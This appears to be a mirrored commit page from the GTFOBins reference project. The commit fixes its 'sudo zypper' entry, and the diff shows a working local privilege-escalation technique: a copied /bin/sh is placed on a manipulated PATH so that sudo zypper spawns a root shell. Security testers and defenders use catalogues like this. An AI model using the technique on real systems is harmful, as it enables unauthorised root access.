mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Fix sudo zypper
`PATH` is a forbidden variable that is not preserved by -E anyway.
This commit is contained in:
parent
9cd6849b8e
commit
b92d9e0ec2
@ -16,6 +16,5 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp -d)
|
TF=$(mktemp -d)
|
||||||
cp /bin/sh $TF/zypper-x
|
cp /bin/sh $TF/zypper-x
|
||||||
export PATH=$TF:$PATH
|
sudo PATH=$TF:$PATH zypper x
|
||||||
sudo -E zypper x
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user